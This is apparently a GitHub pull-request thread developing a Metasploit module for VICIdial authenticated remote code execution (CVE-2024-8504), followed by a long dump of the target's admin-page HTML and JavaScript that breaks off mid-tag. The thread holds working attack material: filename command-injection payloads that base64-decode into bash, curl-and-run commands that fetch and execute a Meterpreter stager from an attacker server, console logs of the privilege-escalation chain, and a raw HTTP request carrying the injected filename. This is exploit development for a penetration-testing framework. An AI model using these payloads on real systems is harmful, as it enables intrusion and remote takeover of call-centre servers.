Add VICIdial Authenticated RCE module (CVE-2024-8504)

[Chocapikk]

Hello Metasploit Team,

This draft PR introduces the VICIdial Authenticated RCE module (CVE-2024-8504), based on the advisory from KoreLogic. I conducted some research to correct the original Python exploit, and it now works. Remaining tasks include finding the right payload to bypass badchars, randomizing requests, and finalizing RCE. The code will be reorganized into functions later, and documentation is not ready yet.

[Chocapikk]

Hello, during the development of this module, I'm facing an issue where I can't get a Meterpreter session to work. While simple commands like curl are executed successfully, there are several restrictions.

I've noticed several conditions:

• The semicolon ; is forbidden.
• A payload that's too long won't execute (91 maximum chars).
• Spaces are accepted.
• You can escape a command using \" and ignore the rest by closing with &\".

Using the following lines:

command = 'curl chocapikk.com'
payload_test = "echo -n #{Rex::Text.encode_base64(command)}|base64 -d|bash -"  
malicious_filename = "\"& #{payload_test} &\""

the payload should be base64 encoded or hex to have a valid file format. The / characters are accepted.

However, with:

malicious_filename = "1337$(#{payload_test})"

the / characters in the payload are not accepted.

At this point, it's becoming a real challenge, and I'm completely stuck on this issue.

The initial payload in the advisory is $([email protected]$IFS-o$IFS.c&&bash$IFS.c), but with Metasploit, I can't (don't know how to) reproduce this format with the stager's server URL. There's always a randomly generated URI, and it's far too long for the target.

I'm completely out of ideas.

[dledda-r7]

Hello @Chocapikk, I'm setting up the VICIdial target to test both your modules, regarding the issue with the Meterpreter, from the message you wrote I didn't fully understood what is the issue but I may have some "ideas" that we can try:

• Command Stagers
• Try to adjust the Fetch Payload to a shorter URL.

[Chocapikk]

Hi @dledda-r7,

I have provided both working documentations in this PR and the one at #19453. For the RCE, the exploit works but requires two web servers—one for SRVPORT / SRVHOST and another for FETCH_SRVPORT. I wasn't able to run the stager and payload on the same port, which would have been more convenient. Additionally, when using the HttpServer mixin, the job runs in the background, and once a session is obtained, we have to manually select it since it remains in the background. But overall, the exploit is working.

Also, I would like to stop the web server as soon as a connection is made, because it's a cron-based execution, and it keeps opening new sessions repeatedly. Any help with this would be appreciated!

[dledda-r7]

Hello @Chocapikk, OK let me re-setup the target as I saw you are testing on version 11 of VICIDial instead of 10.

[dledda-r7]

I'm having some issue getting this working.

msf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) > 
[*] Fetch handler listening on 172.26.247.30:8080
[*] HTTP server started
[*] Adding resource /GvrbULWAtrIMO9PwicnKJw
[*] Started reverse TCP handler on 172.26.247.30:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] VICIdial version: 2.14-705
[+] The target is vulnerable.
[*] Using URL: http://172.26.247.30:5000/J4VChGLMC
[*] Server started.
[*] Payload is ready at /
[+] Authenticated successfully as user '6666'
[+] Updated user settings to increase privileges
[+] Updated system settings
[+] Created dummy campaign 'Corkery, Lueilwitz and Davis'
[+] Updated dummy campaign settings
[+] Created dummy list 'Corkery, Lueilwitz and Davis List' for campaign '219810'
[+] Found phone credentials: Extension=callin, Password=password, Recording Extension=8309
[+] Retrieved dynamic field names: MGR_login20240919, MGR_pass20240919
[+] Entered "manager" credentials to override shift enforcement
[+] Authenticated as agent using phone credentials
[+] Session Name: 1726745884_8300defaul13257799, Session ID: 8600051
[*] Generated malicious command: $([email protected]:5000$IFS-o$IFS.EBKx&&bash$IFS.EBKx)
[-] Exploit aborted due to failure: unknown: Failed to get recording ID
[*] Server stopped.
Interrupt: use the 'exit' command to quit
msf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) > 

Last request

[+] Authenticated as agent using phone credentials
[+] Session Name: 1726746046_8300defaul12080600, Session ID: 8600051
[*] Generated malicious command: $([email protected]:5000$IFS-o$IFS.eeAs&&bash$IFS.eeAs)
####################
# Request:
####################
POST /agc/manager_send.php HTTP/1.1
Host: 172.26.247.31                                                                                                                                                                                                         
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15                                                                                          
Authorization: Basic NjY2NjpwYXNzd29yZA==                                                                                                                                                                                   
Content-Type: application/x-www-form-urlencoded                                                                                                                                                                             
Content-Length: 317                                                                                                                                                                                                         
                                                                                                                                                                                                                            
server_ip=172.26.247.31&session_name=1726746046_8300defaul12080600&user=6666&pass=password&ACTION=MonitorConf&format=text&channel=Local/8309%40default&filename=%24%28curl%24IFS-k%24IFS%40172.26.247.30%3a5000%24IFS-o%24IFS.eeAs%26%26bash%24IFS.eeAs%29&exten=8309&ext_context=default&ext_priority=1&FROMvdc=YES&FROMapi=                                                                                                                           
####################
# Response:
####################
HTTP/1.1 200 OK
Date: Thu, 19 Sep 2024 11:40:46 GMT                                                                                                                                                                                         
Server: Apache                                                                                                                                                                                                              
X-Powered-By: PHP/7.4.33                                                                                                                                                                                                    
Cache-Control: no-cache, must-revalidate                                                                                                                                                                                    
Pragma: no-cache                                                                                                                                                                                                            
Content-Length: 68                                                                                                                                                                                                          
Content-Type: text/html; charset=utf-8                                                                                                                                                                                      
                                                                                                                                                                                                                            
Invalid session_name: |1726746046_8300defaul12080600|172.26.247.31|                                                                                                                                                         
                                                                                                                                                                                                                            
[-] Exploit aborted due to failure: unknown: Failed to get recording ID
[*] Server stopped.

[Chocapikk]

Hello I will debug it later, surprising because in my lab I never had this error

[jheysel-r7]

Can the string KoreLogic be randomized? Also, are all these options required?

[Chocapikk]

Hi I forgot to modify it actually thanks.

For all the options I will have to try but yes there are probably some necessary ones. For example ADD is not modifiable it's a code to perform the action

[jheysel-r7]

As for you comment:

Also, I would like to stop the web server as soon as a connection is made, because it's a cron-based execution, and it keeps opening new sessions repeatedly. Any help with this would be appreciated!

I know there's size constraints in the payload but ideally you would add a sed command to the payload so that the payload would remove itself from the cron file. However if that is not possible you could have an on_new_session method that cleans up the cron job once the session is established. Best case scenario would be the cron job gets cleaned up regardless of whether or not a session is established.

[jheysel-r7]

You might be able to use the encoders we have in metasploit to solve this issue, we've recently added a base64 encoder for command payloads. If you list all the characters that aren't allowed in the payload as BadChars that might help as well.

[Chocapikk]

Hi, here's what it looks like using the following badchars:

'BadChars' => "'\"\\; ",

[*] Generated malicious command: $(echo${IFS}Y3VybCAtc28gLi9hbXpUdVJTUXdvIGh0dHA6Ly8xOTIuMTY4LjEuMzY6ODA4MC9Mb1BsbmpFcGVPZXhaTlZwcG42Y0FBOyBjaG1vZCAreCAuL2FtelR1UlNRd287IC4vYW16VHVSU1F3byAm|((command${IFS}-v${IFS}base64${IFS}>/dev/null${IFS}&&${IFS}(base64${IFS}--decode${IFS}||${IFS}base64${IFS}-d))${IFS}||${IFS}(command${IFS}-v${IFS}openssl${IFS}>/dev/null${IFS}&&${IFS}openssl${IFS}enc${IFS}-base64${IFS}-d))|sh)

The payload is much too long, this must pass the following condition

preg_replace("/\'|\"|\\\\|;/","",$filename);

Here I have no solution other than using the current paylaod rather than playing with badchars.

I tried to play with MaxSize so as not to exceed 90-91 characters because that's the limit.

[dledda-r7]

I tried to play a bit with the encoders and I don't think is possible to pass directly the Fetch Payloads because at minimum is already pretty big.

msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_FILENAME A
FETCH_FILENAME => A
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > set FETCH_URIPATH A
FETCH_URIPATH => A
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f
curl -so /tmp/A http://172.17.135.208:8080/A; chmod +x /tmp/A; /tmp/A &
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 

If we consider we need to encode spaces with ${IFS} and replace probably the ; with && we are execeeding for sure 91 bytes.

[jheysel-r7]

Given the constraints (mainly the 91 character limit) I think that the current solution is likely the best one in order to exploit this vulnerability. You're still establishing the session by using payload.encoded which is the main thing we like to keep consistent.

[jheysel-r7]

Hey @Chocapikk, I'm happy to try and help sort out the payload / encoding issues you're facing here.

Although I've followed the installation steps in order to get a vulnerable version setup but am running into an issue.
I'm getting the error Failed to find the "MODIFY" link in the phone credentials page in the #fetch_phone_credentials.

res.get_html_document.at_css('a:contains("MODIFY")')&.get_attribute('href') is coming back nil.

Wondering if you've maybe seen this before in your testing or might have any idea where I might be going wrong? I've included my module output I've also printed the res.get_html_docuement from the request sent at the start of fetch_phone_credentials that doesn't include the MODIFY string.

sf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) > rexploit
[*] Reloading module...
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] VICIdial version: 2.14-705
[+] The target is vulnerable.
[*] Using URL: http://172.16.199.1:5000/wrjAQ8BCRnsTX
msf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) > [*] Server started.
[*] Payload is ready at /
[+] Authenticated successfully as user '6666'
[+] Updated user settings to increase privileges
[+] Updated system settings
[+] Created dummy campaign 'Hahn, Heller and Schmidt'
[+] Updated dummy campaign settings
[+] Created dummy list 'Hahn, Heller and Schmidt List' for campaign '284816'
[-] Exploit aborted due to failure: not-found: Failed to find the "MODIFY" link in the phone credentials page
[*] Server stopped.

res.get_html_document (not containing MODIFY)

ADMINISTRATION: COPYRIGHT TRADEMARK LICENSE

var field_name = '';
var user = '6666';
var epoch = '1727305843';


	var weak = new Image();
	weak.src = "images/weak.png";
	var medium = new Image();
	medium.src = "images/medium.png";
	var strong = new Image();
	strong.src = "images/strong.png";

	function pwdChanged(pwd_field_str, pwd_img_str, pwd_len_field, pwd_len_min)
		{
		var pwd_field = document.getElementById(pwd_field_str);
		var pwd_field_value = pwd_field.value;
		var pwd_img = document.getElementById(pwd_img_str);
		var pwd_len = pwd_field_value.length

	//	var strong_regex = new RegExp( "^(?=.{8,})(?=.*[a-z])(?=.*[A-Z])(?=.*[0-9])", "g" );
	//	var medium_regex = new RegExp( "^(?=.{6,})(((?=.*[a-z])(?=.*[A-Z]))|((?=.*[a-z])(?=.*[0-9]))|((?=.*[A-Z])(?=.*[0-9]))).*$", "g" );
		var strong_regex = new RegExp( "^(?=.{20,})(?=.*[a-zA-Z])(?=.*[0-9])", "g" );
		var medium_regex = new RegExp( "^(?=.{10,})(?=.*[a-zA-Z])(?=.*[0-9])", "g" );

		if (strong_regex.test(pwd_field.value) )
			{
			if (pwd_img.src != strong.src)
				{pwd_img.src = strong.src;}
			}
		else if (medium_regex.test( pwd_field.value) )
			{
			if (pwd_img.src != medium.src)
				{pwd_img.src = medium.src;}
			}
		else
			{
			if (pwd_img.src != weak.src)
				{pwd_img.src = weak.src;}
			}
		if ( (pwd_len_min > 0) && (pwd_len_min > pwd_len) )
			{document.getElementById(pwd_len_field).innerHTML = "<font color=red><b>" + pwd_len + "</b></font>";}
		else
			{document.getElementById(pwd_len_field).innerHTML = "<font color=black><b>" + pwd_len + "</b></font>";}
		}

	function openNewWindow(url)
		{
		window.open (url,"",'width=620,height=300,scrollbars=yes,menubar=yes,address=yes');
		}
	function scriptInsertField()
		{
		openField = '--A--';
		closeField = '--B--';
		var textBox = document.scriptForm.script_text;
		var scriptIndex = document.getElementById("selectedField").selectedIndex;
		var insValue =  document.getElementById('selectedField').options[scriptIndex].value;
		if (document.selection)
			{
			//IE
			textBox = document.scriptForm.script_text;
			insValue = document.scriptForm.selectedField.options[document.scriptForm.selectedField.selectedIndex].text;
			textBox.focus();
			sel = document.selection.createRange();
			sel.text = openField + insValue + closeField;
			}
		else if (textBox.selectionStart || textBox.selectionStart == 0)
			{
			//Mozilla
			var startPos = textBox.selectionStart;
			var endPos = textBox.selectionEnd;
			textBox.value = textBox.value.substring(0, startPos)
			+ openField + insValue + closeField
			+ textBox.value.substring(endPos, textBox.value.length);
			}
		else
			{
			textBox.value += openField + insValue + closeField;
			}
		}

		var pass = '1234';

	mouseY=0;
	function getMousePos(event) {
		mouseY=event.pageY;
	}
	document.addEventListener("click", getMousePos);

	var chooser_field='';
	var chooser_field_td='';
	var chooser_type='';

	function launch_chooser(fieldname,stage)
		{
		var h = window.innerHeight;
		var vposition=mouseY;

		var audiolistURL = "./non_agent_api.php";
		var audiolistQuery = "source=admin&function=sounds_list&user=" + user + "&pass=" + pass + "&format=selectframe&stage=" + stage + "&comments=" + fieldname;
		var Iframe_content = '<IFRAME SRC="' + audiolistURL + '?' + audiolistQuery + '"  style="width:740;height:440;background-color:white;" scrolling="NO" frameborder="0" allowtransparency="true" id="audio_chooser_frame' + epoch + '" name="audio_chooser_frame" width="740" height="460" STYLE="z-index:2"> </IFRAME>';

		document.getElementById("audio_chooser_span").style.position = "absolute";
		document.getElementById("audio_chooser_span").style.left = "220px";
		document.getElementById("audio_chooser_span").style.top = vposition + "px";
		document.getElementById("audio_chooser_span").style.visibility = 'visible';
		document.getElementById("audio_chooser_span").innerHTML = Iframe_content;
		}

	function launch_moh_chooser(fieldname,stage)
		{
		var h = window.innerHeight;
		var vposition=mouseY;

		var audiolistURL = "./non_agent_api.php";
		var audiolistQuery = "source=admin&function=moh_list&user=" + user + "&pass=" + pass + "&format=selectframe&stage=" + stage + "&comments=" + fieldname;
		var Iframe_content = '<IFRAME SRC="' + audiolistURL + '?' + audiolistQuery + '"  style="width:740;height:440;background-color:white;" scrolling="NO" frameborder="0" allowtransparency="true" id="audio_chooser_frame' + epoch + '" name="audio_chooser_frame" width="740" height="460" STYLE="z-index:2"> </IFRAME>';

		document.getElementById("audio_chooser_span").style.position = "absolute";
		document.getElementById("audio_chooser_span").style.left = "220px";
		document.getElementById("audio_chooser_span").style.top = vposition + "px";
		document.getElementById("audio_chooser_span").style.visibility = 'visible';
		document.getElementById("audio_chooser_span").innerHTML = Iframe_content;
		}

	function launch_ingroup_chooser(fieldname,stage)
		{
		var h = window.innerHeight;
		var vposition=mouseY;

		var apilistURL = "./non_agent_api.php";
		var apilistQuery = "source=admin&function=ingroup_list&user=" + user + "&pass=" + pass + "&format=selectframe&stage=" + stage + "&comments=" + fieldname;
		var Iframe_content = '<IFRAME SRC="' + apilistURL + '?' + apilistQuery + '"  style="width:740;height:440;background-color:white;" scrolling="NO" frameborder="0" allowtransparency="true" id="audio_chooser_frame' + epoch + '" name="audio_chooser_frame" width="740" height="460" STYLE="z-index:2"> </IFRAME>';

		document.getElementById("audio_chooser_span").style.position = "absolute";
		document.getElementById("audio_chooser_span").style.left = "220px";
		document.getElementById("audio_chooser_span").style.top = vposition + "px";
		document.getElementById("audio_chooser_span").style.visibility = 'visible';
		document.getElementById("audio_chooser_span").innerHTML = Iframe_content;
		}

	function launch_callmenu_chooser(fieldname,stage)
		{
		var h = window.innerHeight;
		var vposition=mouseY;

		var apilistURL = "./non_agent_api.php";
		var apilistQuery = "source=admin&function=callmenu_list&user=" + user + "&pass=" + pass + "&format=selectframe&stage=" + stage + "&comments=" + fieldname;
		var Iframe_content = '<IFRAME SRC="' + apilistURL + '?' + apilistQuery + '"  style="width:740;height:440;background-color:white;" scrolling="NO" frameborder="0" allowtransparency="true" id="audio_chooser_frame' + epoch + '" name="audio_chooser_frame" width="740" height="460" STYLE="z-index:2"> </IFRAME>';

		document.getElementById("audio_chooser_span").style.position = "absolute";
		document.getElementById("audio_chooser_span").style.left = "220px";
		document.getElementById("audio_chooser_span").style.top = vposition + "px";
		document.getElementById("audio_chooser_span").style.visibility = 'visible';
		document.getElementById("audio_chooser_span").innerHTML = Iframe_content;
		}

	function launch_container_chooser(fieldname,stage,type)
		{
		var h = window.innerHeight;
		var vposition=mouseY;

		var apilistURL = "./non_agent_api.php";
		var apilistQuery = "source=admin&function=container_list&user=" + user + "&pass=" + pass + "&format=selectframe&stage=" + stage + "&comments=" + fieldname + "&type=" + type;
		var Iframe_content = '<IFRAME SRC="' + apilistURL + '?' + apilistQuery + '"  style="width:740;height:440;background-color:white;" scrolling="NO" frameborder="0" allowtransparency="true" id="audio_chooser_frame' + epoch + '" name="audio_chooser_frame" width="740" height="460" STYLE="z-index:2"> </IFRAME>';

		document.getElementById("audio_chooser_span").style.position = "absolute";
		document.getElementById("audio_chooser_span").style.left = "220px";
		document.getElementById("audio_chooser_span").style.top = vposition + "px";
		document.getElementById("audio_chooser_span").style.visibility = 'visible';
		document.getElementById("audio_chooser_span").innerHTML = Iframe_content;
		}

	function launch_vm_chooser(fieldname,stage)
		{
		var h = window.innerHeight;
		var vposition=mouseY;

		var audiolistURL = "./non_agent_api.php";
		var audiolistQuery = "source=admin&function=vm_list&user=" + user + "&pass=" + pass + "&format=selectframe&stage=" + stage + "&comments=" + fieldname;
		var Iframe_content = '<IFRAME SRC="' + audiolistURL + '?' + audiolistQuery + '"  style="width:740;height:440;background-color:white;" scrolling="NO" frameborder="0" allowtransparency="true" id="audio_chooser_frame' + epoch + '" name="audio_chooser_frame" width="740" height="460" STYLE="z-index:2"> </IFRAME>';

		document.getElementById("audio_chooser_span").style.position = "absolute";
		document.getElementById("audio_chooser_span").style.left = "220px";
		document.getElementById("audio_chooser_span").style.top = vposition + "px";
		document.getElementById("audio_chooser_span").style.visibility = 'visible';
		document.getElementById("audio_chooser_span").innerHTML = Iframe_content;
		}

	function launch_color_chooser(fieldname,stage,type)
		{
		var h = window.innerHeight;
		var vposition=mouseY;
		chooser_field = fieldname;
		chooser_field_td = fieldname + '_td';
		chooser_type = type;

		var span_content = '<span id="color_chooser_frame' + epoch + '" name="color_chooser_frame" style="width:740;height:440;background-color:white;overflow:scroll;z-index:2;">' + " &nbsp; <a href=\"javascript:close_chooser();\"><font size=1 face='Arial,Helvetica'>close frame</font></a> &nbsp; <BR><div id='select_color_frame' style=\"height:400px;width:400px;overflow:scroll;background-color:white;\"><table border=0 cellpadding=2 cellspacing=2 width=400 bgcolor=white><tr bgcolor=\"#F6F6F6\"><td>IndianRed </td><td><a href=\"javascript:choose_color('CD5C5C');\"><font size=1 face='Arial,Helvetica'>#CD5C5C</a> </td><td bgcolor='#CD5C5C'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>LightCoral </td><td><a href=\"javascript:choose_color('F08080');\"><font size=1 face='Arial,Helvetica'>#F08080</a> </td><td bgcolor='#F08080'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Salmon </td><td><a href=\"javascript:choose_color('FA8072');\"><font size=1 face='Arial,Helvetica'>#FA8072</a> </td><td bgcolor='#FA8072'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>DarkSalmon </td><td><a href=\"javascript:choose_color('E9967A');\"><font size=1 face='Arial,Helvetica'>#E9967A</a> </td><td bgcolor='#E9967A'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>LightSalmon </td><td><a href=\"javascript:choose_color('FFA07A');\"><font size=1 face='Arial,Helvetica'>#FFA07A</a> </td><td bgcolor='#FFA07A'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Crimson </td><td><a href=\"javascript:choose_color('DC143C');\"><font size=1 face='Arial,Helvetica'>#DC143C</a> </td><td bgcolor='#DC143C'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Red </td><td><a href=\"javascript:choose_color('FF0000');\"><font size=1 face='Arial,Helvetica'>#FF0000</a> </td><td bgcolor='#FF0000'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>FireBrick </td><td><a href=\"javascript:choose_color('B22222');\"><font size=1 face='Arial,Helvetica'>#B22222</a> </td><td bgcolor='#B22222'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>DarkRed </td><td><a href=\"javascript:choose_color('8B0000');\"><font size=1 face='Arial,Helvetica'>#8B0000</a> </td><td bgcolor='#8B0000'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Pink </td><td><a href=\"javascript:choose_color('FFC0CB');\"><font size=1 face='Arial,Helvetica'>#FFC0CB</a> </td><td bgcolor='#FFC0CB'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>LightPink </td><td><a href=\"javascript:choose_color('FFB6C1');\"><font size=1 face='Arial,Helvetica'>#FFB6C1</a> </td><td bgcolor='#FFB6C1'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>HotPink </td><td><a href=\"javascript:choose_color('FF69B4');\"><font size=1 face='Arial,Helvetica'>#FF69B4</a> </td><td bgcolor='#FF69B4'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>DeepPink </td><td><a href=\"javascript:choose_color('FF1493');\"><font size=1 face='Arial,Helvetica'>#FF1493</a> </td><td bgcolor='#FF1493'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>MediumVioletRed </td><td><a href=\"javascript:choose_color('C71585');\"><font size=1 face='Arial,Helvetica'>#C71585</a> </td><td bgcolor='#C71585'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>PaleVioletRed </td><td><a href=\"javascript:choose_color('DB7093');\"><font size=1 face='Arial,Helvetica'>#DB7093</a> </td><td bgcolor='#DB7093'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>LightSalmon </td><td><a href=\"javascript:choose_color('FFA07A');\"><font size=1 face='Arial,Helvetica'>#FFA07A</a> </td><td bgcolor='#FFA07A'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Coral </td><td><a href=\"javascript:choose_color('FF7F50');\"><font size=1 face='Arial,Helvetica'>#FF7F50</a> </td><td bgcolor='#FF7F50'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Tomato </td><td><a href=\"javascript:choose_color('FF6347');\"><font size=1 face='Arial,Helvetica'>#FF6347</a> </td><td bgcolor='#FF6347'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>OrangeRed </td><td><a href=\"javascript:choose_color('FF4500');\"><font size=1 face='Arial,Helvetica'>#FF4500</a> </td><td bgcolor='#FF4500'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>DarkOrange </td><td><a href=\"javascript:choose_color('FF8C00');\"><font size=1 face='Arial,Helvetica'>#FF8C00</a> </td><td bgcolor='#FF8C00'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Orange </td><td><a href=\"javascript:choose_color('FFA500');\"><font size=1 face='Arial,Helvetica'>#FFA500</a> </td><td bgcolor='#FFA500'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Gold </td><td><a href=\"javascript:choose_color('FFD700');\"><font size=1 face='Arial,Helvetica'>#FFD700</a> </td><td bgcolor='#FFD700'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Yellow </td><td><a href=\"javascript:choose_color('FFFF00');\"><font size=1 face='Arial,Helvetica'>#FFFF00</a> </td><td bgcolor='#FFFF00'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>LightYellow </td><td><a href=\"javascript:choose_color('FFFFE0');\"><font size=1 face='Arial,Helvetica'>#FFFFE0</a> </td><td bgcolor='#FFFFE0'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>LemonChiffon </td><td><a href=\"javascript:choose_color('FFFACD');\"><font size=1 face='Arial,Helvetica'>#FFFACD</a> </td><td bgcolor='#FFFACD'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>LightGoldenrodYellow </td><td><a href=\"javascript:choose_color('FAFAD2');\"><font size=1 face='Arial,Helvetica'>#FAFAD2</a> </td><td bgcolor='#FAFAD2'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>PapayaWhip </td><td><a href=\"javascript:choose_color('FFEFD5');\"><font size=1 face='Arial,Helvetica'>#FFEFD5</a> </td><td bgcolor='#FFEFD5'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Moccasin </td><td><a href=\"javascript:choose_color('FFE4B5');\"><font size=1 face='Arial,Helvetica'>#FFE4B5</a> </td><td bgcolor='#FFE4B5'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>PeachPuff </td><td><a href=\"javascript:choose_color('FFDAB9');\"><font size=1 face='Arial,Helvetica'>#FFDAB9</a> </td><td bgcolor='#FFDAB9'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>PaleGoldenrod </td><td><a href=\"javascript:choose_color('EEE8AA');\"><font size=1 face='Arial,Helvetica'>#EEE8AA</a> </td><td bgcolor='#EEE8AA'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Khaki </td><td><a href=\"javascript:choose_color('F0E68C');\"><font size=1 face='Arial,Helvetica'>#F0E68C</a> </td><td bgcolor='#F0E68C'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>DarkKhaki </td><td><a href=\"javascript:choose_color('BDB76B');\"><font size=1 face='Arial,Helvetica'>#BDB76B</a> </td><td bgcolor='#BDB76B'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Lavender </td><td><a href=\"javascript:choose_color('E6E6FA');\"><font size=1 face='Arial,Helvetica'>#E6E6FA</a> </td><td bgcolor='#E6E6FA'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Thistle </td><td><a href=\"javascript:choose_color('D8BFD8');\"><font size=1 face='Arial,Helvetica'>#D8BFD8</a> </td><td bgcolor='#D8BFD8'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Plum </td><td><a href=\"javascript:choose_color('DDA0DD');\"><font size=1 face='Arial,Helvetica'>#DDA0DD</a> </td><td bgcolor='#DDA0DD'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Violet </td><td><a href=\"javascript:choose_color('EE82EE');\"><font size=1 face='Arial,Helvetica'>#EE82EE</a> </td><td bgcolor='#EE82EE'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Orchid </td><td><a href=\"javascript:choose_color('DA70D6');\"><font size=1 face='Arial,Helvetica'>#DA70D6</a> </td><td bgcolor='#DA70D6'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Fuchsia </td><td><a href=\"javascript:choose_color('FF00FF');\"><font size=1 face='Arial,Helvetica'>#FF00FF</a> </td><td bgcolor='#FF00FF'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Magenta </td><td><a href=\"javascript:choose_color('FF00FF');\"><font size=1 face='Arial,Helvetica'>#FF00FF</a> </td><td bgcolor='#FF00FF'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>MediumOrchid </td><td><a href=\"javascript:choose_color('BA55D3');\"><font size=1 face='Arial,Helvetica'>#BA55D3</a> </td><td bgcolor='#BA55D3'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>MediumPurple </td><td><a href=\"javascript:choose_color('9370DB');\"><font size=1 face='Arial,Helvetica'>#9370DB</a> </td><td bgcolor='#9370DB'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>RebeccaPurple </td><td><a href=\"javascript:choose_color('663399');\"><font size=1 face='Arial,Helvetica'>#663399</a> </td><td bgcolor='#663399'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>BlueViolet </td><td><a href=\"javascript:choose_color('8A2BE2');\"><font size=1 face='Arial,Helvetica'>#8A2BE2</a> </td><td bgcolor='#8A2BE2'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>DarkViolet </td><td><a 